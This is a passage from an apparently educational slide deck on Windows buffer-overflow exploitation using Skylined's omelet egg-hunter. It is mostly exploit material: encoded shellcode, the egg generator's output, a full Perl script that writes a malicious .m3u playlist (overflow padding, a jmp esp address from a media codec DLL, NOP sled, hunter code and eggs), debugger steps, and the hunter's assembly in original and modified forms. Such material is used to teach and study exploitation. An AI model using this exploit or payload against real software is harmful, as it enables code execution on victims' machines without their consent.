        "\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
        "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
        "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
        "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
        "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
        "\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
        "\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
        "\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
        "\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
        "\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
        "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
        "\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
        "\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
        "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
        "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
        "\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
        "\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
        "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
        "\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
        "\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
        "\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
        "\x31\x42\x4c\x42\x43\x45\x50\x41\x41";

    open(FILE, ">$scfile") or die "cannot open $scfile: $!";
    binmode(FILE);    # binary-safe write on Windows: no newline translation of the shellcode bytes
    print FILE $shellcode;
    close(FILE);
    print "Wrote " . length($shellcode) . " bytes to file " . $scfile . "\n";

Page 57: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make the Omelet-Egg-Hunter?

Convert the shellcode into eggs

The maximum amount of shellcode one egg can hold is 127 bytes; Marker = 0xBADA55

    C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py
    Syntax: w32_SEH_omelet.py "omelet bin file" "shellcode bin file" "output txt file" [egg size] [marker bytes]

    Where:
      omelet bin file    = The omelet shellcode stage binary code followed by three bytes of the offsets of the "marker bytes", "max index" and "egg size" variables in the code.
      shellcode bin file = The shellcode binary code you want to have stored in the eggs and reconstructed by the omelet shellcode stage code.
      output txt file    = The file you want the omelet egg-hunt code and the eggs to be written to (in text format).
      egg size           = The size of each egg (legal values: 6-127, default: 127)
      marker bytes       = The value you want to use as a marker to distinguish the eggs from other data in user-land address space (legal values: 0-0xFFFFFF, default value: 0x280876)

    C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py w32_SEH_omelet.bin shellcode.bin calceggs.txt 127 0xBADA55

Page 58: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make the Omelet-Egg-Hunter?

Convert the shellcode into eggs

The maximum amount of shellcode one egg can hold is 127 bytes; Marker = 0xBADA55

Generated output (calceggs.txt):

    // This is the binary code that needs to be executed to find the eggs,
    // recombine the orignal shellcode and execute it. It is 82 bytes:
    omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x03\x97\xEB\xDB\x31\xC0\x64\xFF\x50\x08";

    // These are the eggs that need to be injected into the target process
    // for the omelet shellcode to be able to recreate the original shellcode
    // (you can insert them as many times as you want, as long as each one is
    // inserted at least once). They are 127 bytes each:
    egg0 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";
    egg1 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";
    egg2 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
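To make the egg layout and the hunter's three steps (search memory, find marker, check length/index, then reassemble) concrete, here is an added Python model; it is not Skylined's tool or the slide author's code. The 5-byte header it uses (payload size byte 0x7A, 0xFF minus the egg index, then the 3-byte little-endian marker 55 DA BA) is read off the egg0/egg1/egg2 strings above; the 0x40 padding byte, the sample payload and the constructed memory image are assumptions, and the same scan is what you would run over a memory dump to spot omelet eggs by their header.

```python
"""Model of the omelet egg format shown on these slides (egg size 127, marker 0xBADA55).

Added example, not Skylined's tool or the slide author's code.  Header layout, taken
from the generated eggs (egg0 starts 7A FF 55 DA BA, egg1 7A FE ..., egg2 7A FD ...):
  byte 0     : payload bytes per egg = egg size - 5 (0x7A = 122 for egg size 127)
  byte 1     : 0xFF - egg index (0xFF, 0xFE, 0xFD, ...)
  bytes 2..4 : marker, little-endian (0x55 0xDA 0xBA for 0xBADA55)
  bytes 5..  : payload, padded with 0x40 to a full egg (assumed from egg2's padding)
"""
from typing import Dict, List, Optional

HEADER_LEN = 5
PAD_BYTE = 0x40  # filler seen at the end of egg2 on the slide; harmless as code (inc eax)


def make_eggs(shellcode: bytes, egg_size: int = 127, marker: int = 0xBADA55) -> List[bytes]:
    """Split a payload into fixed-size eggs that carry the 5-byte omelet header."""
    if not 6 <= egg_size <= 127:
        raise ValueError("egg size must be 6..127 (tool's legal range)")
    if not 0 <= marker <= 0xFFFFFF:
        raise ValueError("marker must fit in 3 bytes")
    payload_len = egg_size - HEADER_LEN
    chunks = [shellcode[i:i + payload_len] for i in range(0, len(shellcode), payload_len)]
    if len(chunks) > 0xFF:
        raise ValueError("too many eggs for a one-byte index")
    eggs = []
    for index, chunk in enumerate(chunks):
        header = bytes([payload_len, 0xFF - index]) + marker.to_bytes(3, "little")
        eggs.append(header + chunk.ljust(payload_len, bytes([PAD_BYTE])))
    return eggs


def find_eggs(memory: bytes, egg_count: int, egg_size: int = 127,
              marker: int = 0xBADA55) -> Dict[int, bytes]:
    """Scan a memory image for eggs and return {index: payload} for each valid one.

    Step 1: look for the size byte.  Step 2: confirm the marker behind it.
    Step 3: check the index against the expected egg count and that a whole egg
    fits before the end of the image.  Eggs injected more than once are fine;
    the first valid copy of an index wins.
    """
    payload_len = egg_size - HEADER_LEN
    marker_bytes = marker.to_bytes(3, "little")
    found: Dict[int, bytes] = {}
    pos = memory.find(bytes([payload_len]))
    while pos != -1:
        if pos + egg_size <= len(memory) and memory[pos + 2:pos + 5] == marker_bytes:
            index = 0xFF - memory[pos + 1]
            if index < egg_count and index not in found:
                found[index] = memory[pos + HEADER_LEN:pos + egg_size]
        pos = memory.find(bytes([payload_len]), pos + 1)
    return found


def reassemble(memory: bytes, egg_count: int, egg_size: int = 127,
               marker: int = 0xBADA55) -> Optional[bytes]:
    """Rebuild the payload in index order; None if any egg is missing (the hunter
    would otherwise jump into an incomplete buffer)."""
    found = find_eggs(memory, egg_count, egg_size, marker)
    if len(found) != egg_count:
        return None
    return b"".join(found[i] for i in range(egg_count))


# Constructed sample: 200 bytes standing in for a payload (no real shellcode here).
SAMPLE = bytes(range(1, 201))
EGGS = make_eggs(SAMPLE)                      # 2 eggs of 127 bytes (122 + 78 payload bytes)
GARBAGE = b"This is a bunch of garbage" * 10  # filler between eggs, as in the slide's layout

# Constructed memory image: eggs out of order, one of them twice, filler in between.
MEMORY = GARBAGE + EGGS[1] + GARBAGE + EGGS[0] + GARBAGE + EGGS[1]

if __name__ == "__main__":
    rebuilt = reassemble(MEMORY, egg_count=len(EGGS))
    print(len(EGGS), "eggs found and reassembled:", rebuilt is not None and rebuilt.startswith(SAMPLE))
```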

Page 59: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make the Omelet-Egg-Hunter?

Convert the shellcode into eggs

The maximum amount of shellcode one egg can hold is 127 bytes; Marker = 0xBADA55

[Figure: the calceggs.txt output from the previous slide, with omelet_code, egg0, egg1 and egg2 called out.]

Page 60: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make the Omelet-Egg-Hunter?

Exploit script (OmeletEggHuntingExploit1.m3u): jmp esp gadget, NOP padding, the omelet code, then the three eggs separated by garbage:

    my $file = "OmeletEggHuntingExploit1.m3u";

    my $junk = "A" x 26039;
    my $eip = pack('V', 0x7608fcfe);    # jmp esp from MSRMCcodec02.dll
    my $padding = "\x90" x 25;
    my $garbage = "This is a bunch of garbage" x 10;

    my $omelet_code =
        "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2" .
        "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59" .
        "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08" .
        "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF" .
        "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8" .
        "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";

    my $egg1 =
        "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50" .
        "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33" .
        "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
        "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
        "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30" .
        "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45" .
        "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31" .
        "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";

    my $egg2 =
        "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59" .
        "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43" .
        "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55" .
        "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44" .
        "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C" .
        "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51" .
        "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30" .
        "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";

    my $egg3 =
        "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38" .
        "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D" .
        "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37" .
        "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40" .
        "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" .
        "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" .
        "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" .
        "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";

    open(my $FILE, ">$file") or die "cannot open $file: $!";
    binmode($FILE);    # binary-safe write: keep every byte of the omelet code and eggs as-is
    print $FILE $junk . $eip . $padding . $omelet_code . $garbage . $egg1 . $garbage . $egg2 . $garbage . $egg3;
    close($FILE);
    print "m3u File Created successfully\n";

Page 61: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make the Omelet-Egg-Hunter?

An access violation occurs (Access violation when reading [00000000])

Page 62: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make the Omelet-Egg-Hunter?

w32_SEH_omelet.asm / shellcode analysis

[Figure: the exploit script from the previous slide shown beside the w32_SEH_omelet.asm listing; callouts: "jump to shell code", "omit…".]

Page 63: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

w32_SEH_omelet.asm / shellcode Analysis

my $file = "OmeletEggHuntingExploit1.m3u";

my $junk = "A" x 26039;
my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll

my $padding = "\x90" x 25; # for nop sled
my $garbage = "This is a bunch of garbage" x 10;

# omelet code for finding eggs
my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2".
"\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59".
"\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08".
"\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF".
"\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8".
"\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";

# each egg: LL (0x7A) II (0xFF, 0xFE, 0xFD) marker bytes (55 DA BA) then the egg data
my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50".
"\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33".
"\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42".
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58".
"\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30".
"\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45".
"\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31".
"\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";

my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59".
"\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43".
"\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55".
"\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44".
"\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C".
"\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51".
"\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30".
"\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";

my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38".
"\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D".
"\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37".
"\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40".
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40".
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40".
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40".
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";

omit…

Page 64: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?



EDI → 0x00000000 (the omelet code starts with XOR EDI, EDI, so the scan begins at address 0)

Page 65: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

start:
    XOR EDI, EDI
    jmp SHORT reset_stack

create_SEH_handler:
    PUSH ECX                        ; SEH_frames[0].nextframe == 0xFFFFFFFF
    MOV [FS:EAX], ESP               ; SEH_chain -> SEH_frames[0]
    CLD                             ; SCAN memory upwards from 0
scan_loop:
    MOV AL, egg_size                ; EAX = egg_size
egg_size_location equ $-1 - $$
    REPNE SCASB                     ; Find the first byte
    PUSH EAX                        ; Save egg_size
    MOV ESI, EDI
    LODSD                           ; EAX = II M2 M3 M4
    XOR EAX, (marker << 8) + 0xFF   ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index
marker_bytes_location equ $-3 - $$
    CMP EAX, BYTE max_index         ; Check if the value of EDX is < max_index
max_index_location equ $-1 - $$
    JA reset_stack                  ; No -> This was not a marker, continue scanning
    POP ECX                         ; ECX = egg_size
    IMUL ECX                        ; EAX = egg_size * egg_index == egg_offset
                                    ; EDX = 0 because ECX * EAX is always less than 0x1,000,000
    ADD EAX, [BYTE FS:EDX + 8]      ; EDI += Bottom of stack == position of egg in shellcode.
    XCHG EAX, EDI
copy_loop:
    REP MOVSB                       ; copy egg to basket
    MOV EDI, ESI                    ; EDI = end of egg

reset_stack:
    ; Reset the stack to prevent problems caused by recursive SEH handlers and set
    ; ourselves up to handle any AVs we may cause by scanning memory:
    XOR EAX, EAX                    ; EAX = 0
    MOV ECX, [FS:EAX]               ; EBX = SEH_chain => SEH_frames[X]
find_last_SEH_loop:
    MOV ESP, ECX                    ; ESP = SEH_frames[X]
    POP ECX                         ; EBX = SEH_frames[X].next_frame
    CMP ECX, 0xFFFFFFFF             ; SEH_frames[X].next_frame == none ?
    JNE find_last_SEH_loop          ; No "X -= 1", check next frame
    POP EDX                         ; EDX = SEH_frames[0].handler
    CALL create_SEH_handler         ; SEH_frames[0].handler == SEH_handler

SEH_handler:
    POPA                            ; ESI = [ESP + 4] -> struct exception_info
    LEA ESP, [BYTE ESI+0x18]        ; ESP = struct exception_info->exception_address
    POP EAX                         ; EAX = exception address 0x????????
    OR AX, 0xFFF                    ; EAX = 0x?????FFF
    INC EAX                         ; EAX = 0x?????FFF + 1 -> next page
    JS done                         ; EAX > 0x7FFFFFFF ===> done
    XCHG EAX, EDI                   ; EDI => next page
    JMP reset_stack
done:
    XOR EAX, EAX                    ; EAX = 0
    CALL [BYTE FS:EAX + 8]          ; call the reassembled shellcode at the bottom of the stack (FS:[8])

EDI → 0x00000000 (start: XOR EDI, EDI, so scanning begins at address 0)

Access Violation (raised on every unmapped page the scan touches; SEH_handler rounds EDI up to the next page and jumps back to reset_stack)

Page 66: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg1.bin"
!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg2.bin"
!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg3.bin"

egg1

egg2

egg3

Page 67: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

egg1 (0x000FDxxx)

egg2 (0x000FDxxx)

egg3 (0x000FDxxx)

Page 68: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?


w32_SEH_omelet.asm / modified shell code 1

# original omelet code: begins with XOR EDI, EDI (\x31\xFF), so the scan starts at address 0
my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2".
"\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59".
"\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08".
"\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF".
"\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8".
"\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";

# mov di, 0x1F80 followed by shl edi, 1 seven times -> EDI = 0x1F80 << 7 = 0xFC000,
# just below the eggs found at 0x000FDxxx
my $shlEDI = "\x66\xBF\x80\x1F\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7".
"\xD1\xE7\xD1\xE7"; #0x1F80 shift x 7

# modified omelet code: XOR EDI, EDI replaced by two NOPs (\x90\x90), so the
# start address set in $shlEDI is kept and the scan begins there
my $omelet_code = "\x90\x90\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2".
"\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59".
"\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08".
"\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF".
"\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8".
"\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";

Page 69: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?


w32_SEH_omelet.asm / modified shell code 1


Page 70: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

omit…

Page 71: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?


w32_SEH_omelet.asm / modified shell code 1

Page 72: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?


w32_SEH_omelet.asm / modified shell code 1

Page 73: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting


Page 74: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting


Page 75: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?


w32_SEH_omelet.asm / modified shell code 1

Page 76: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?


custom_w32_SEH_omelet.asm

marker    equ 0x280876
egg_size  equ 0x3
max_index equ 0x2

start:
    mov ebx, 0xffffffff-egg_size+1  ; EBX = -(number of eggs): the placeholder egg_size (3) is reused as the egg count (3 eggs here)
    jmp SHORT reset_stack

copy_loop:
    REP MOVSB                       ; copy egg to basket
    CMP EBX, 0xFFFFFFFF             ; was this the last egg?
    JE done
    INC EBX                         ; one more egg copied
    MOV EDI, ESI                    ; EDI = end of egg

done:
    XOR EAX, EAX                    ; EAX = 0
    CALL [BYTE FS:EAX + 8]          ; call the reassembled shellcode at the bottom of the stack (FS:[8])

Page 77: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?


custom_w32_SEH_omelet.asm

BITS 32

; egg:
;   LL II M1 M2 M3 DD DD DD ... (LL * DD)
;   LL       == Size of eggs (same for all eggs)
;   II       == Index of egg (different for each egg)
;   M1,M2,M3 == Marker byte (same for all eggs)
;   DD       == Data in egg (different for each egg)

marker    equ 0x280876
egg_size  equ 0x3
max_index equ 0x2

start:
    mov ebx, 0xffffffff-egg_size+1  ; EBX = -(number of eggs): the placeholder egg_size (3) is reused as the egg count (3 eggs here)
    jmp SHORT reset_stack

create_SEH_handler:
    PUSH ECX                        ; SEH_frames[0].nextframe == 0xFFFFFFFF
    MOV [FS:EAX], ESP               ; SEH_chain -> SEH_frames[0]
    CLD                             ; SCAN memory upwards from 0
scan_loop:
    MOV AL, egg_size                ; EAX = egg_size
egg_size_location equ $-1 - $$
    REPNE SCASB                     ; Find the first byte
    PUSH EAX                        ; Save egg_size
    MOV ESI, EDI
    LODSD                           ; EAX = II M2 M3 M4
    XOR EAX, (marker << 8) + 0xFF   ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index
marker_bytes_location equ $-3 - $$
    CMP EAX, BYTE max_index         ; Check if the value of EDX is < max_index
max_index_location equ $-1 - $$
    JA reset_stack                  ; No -> This was not a marker, continue scanning
    POP ECX                         ; ECX = egg_size
    IMUL ECX                        ; EAX = egg_size * egg_index == egg_offset
                                    ; EDX = 0 because ECX * EAX is always less than 0x1,000,000
    ADD EAX, [BYTE FS:EDX + 8]      ; EDI += Bottom of stack == position of egg in shellcode.
    XCHG EAX, EDI
copy_loop:
    REP MOVSB                       ; copy egg to basket
    CMP EBX, 0xFFFFFFFF             ; was this the last egg? (note: SEH_handler's POPA reloads EBX from the
    JE done                         ; exception frame, so the count only holds if no AV occurs before the last egg)
    INC EBX                         ; one more egg copied
    MOV EDI, ESI                    ; EDI = end of egg

reset_stack:
    ; Reset the stack to prevent problems caused by recursive SEH handlers and set
    ; ourselves up to handle any AVs we may cause by scanning memory:
    XOR EAX, EAX                    ; EAX = 0
    MOV ECX, [FS:EAX]               ; EBX = SEH_chain => SEH_frames[X]
find_last_SEH_loop:
    MOV ESP, ECX                    ; ESP = SEH_frames[X]
    POP ECX                         ; EBX = SEH_frames[X].next_frame
    CMP ECX, 0xFFFFFFFF             ; SEH_frames[X].next_frame == none ?
    JNE find_last_SEH_loop          ; No "X -= 1", check next frame
    POP EDX                         ; EDX = SEH_frames[0].handler
    CALL create_SEH_handler         ; SEH_frames[0].handler == SEH_handler

SEH_handler:
